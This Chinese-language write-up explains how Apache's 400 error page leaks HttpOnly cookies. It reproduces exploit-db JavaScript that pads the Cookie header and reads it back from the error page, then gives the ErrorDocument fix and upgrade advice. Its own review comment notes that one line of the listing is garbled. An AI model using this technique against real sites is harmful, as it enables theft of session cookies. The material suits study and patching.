很多程序以及一些商业或成熟开源的CMS文章系统,为了防止XSS盗取用户cookie,一般都会给cookie加上HttpOnly属性,禁止直接用JS读取用户的cookie,从而降低XSS的危害;而这个问题刚好可以用来绕过cookie的HttpOnly属性。
用Chrome打开一个站点,按F12打开开发者工具,切换到Console,输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
// Sets (or, when "good" is truthy, expires) ten padding cookies xss0..xss9.
// Each carries an 819-character value, so the next request to "/" goes out
// with roughly 8 KB in its Cookie header. makeRequest() below only reacts
// to a 400 response, so the oversized header is what this snippet relies on
// to provoke the error page -- presumably a request-header size limit on the
// server side, although the write-up itself does not say.
// Defender's note: the observable on the wire is a same-origin GET / with
// a very large Cookie header, answered with HTTP 400.
function setCookies (good) {
  // Construct string for cookie value
  var str = "";
  for (var i=0; i< 819; i++) {
    str += "x";
  }
  // Set cookies. Both branches declare "var cookie"; "var" is
  // function-scoped in JS, so the duplicate declaration is legal.
  for (i = 0; i < 10; i++) {
    // Expire evil cookie: an "expires" date one millisecond in the past
    // makes the browser drop the cookie.
    if (good) {
      var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
    }
    // Set evil cookie: no "expires", so it lives for the session;
    // path=/ so it is attached to the GET / in makeRequest().
    else {
      var cookie = "xss"+i+"="+str+";path=/";
    }
    document.cookie = cookie;
  }
}
// Sends a same-origin GET / after the padding cookies have been set and,
// on a 400 response, reads the request's Cookie header back out of the
// error page body. The snippet therefore depends on the server echoing the
// request headers inside a <pre> block of its 400 page; the ErrorDocument
// workaround and the upgrade advice in the 修复方案 section below remove
// exactly that echo.
function makeRequest() {
  // Set the padding cookies first so they ride along on the request below.
  setCookies();
  // readystatechange handler for the XHR created further down; it closes
  // over the "xhr" variable declared later in this function (hoisted var).
  function parseCookies () {
    var cookie_dict = {};
    // Only react on 400 status: any other outcome is ignored silently.
    if (xhr.readyState === 4 && xhr.status === 400) {
      // Replace newlines and match <pre> content.
      // NOTE(review): match() returns null when the body has no <pre>, so
      // the .length check below would throw instead of skipping.
      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
      if (content.length) {
        // Remove Cookie: prefix, drop the xssN padding cookies, then split
        // the remaining "name=value" pairs on ";"
        content = content[1].replace("Cookie: ", "");
        var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
        // Add cookies to object
        for (var i=0; i<cookies.length; i++) {
          // NOTE(review): "cookies" is the array built above and arrays have
          // no split(); this line of the listing looks garbled (forum markup
          // may have eaten an index) -- compare with the linked original.
          var s_c = cookies.split('=',2);
          cookie_dict[s_c[0]] = s_c[1];
        }
      }
      // Unset malicious cookies: clean up the padding before showing the result.
      setCookies(true);
      alert(JSON.stringify(cookie_dict));
    }
  }
  // Make XHR request: same-origin GET / carrying the oversized Cookie header.
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Entry point: runs as soon as the snippet is pasted into the console.
makeRequest();
然后你就能看见华丽丽的400错误响应,其中包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message 输出一条简单的硬编码错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容。
Apache配置:
ErrorDocument 400 " security test"
当然,升级Apache到最新版本也可以:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html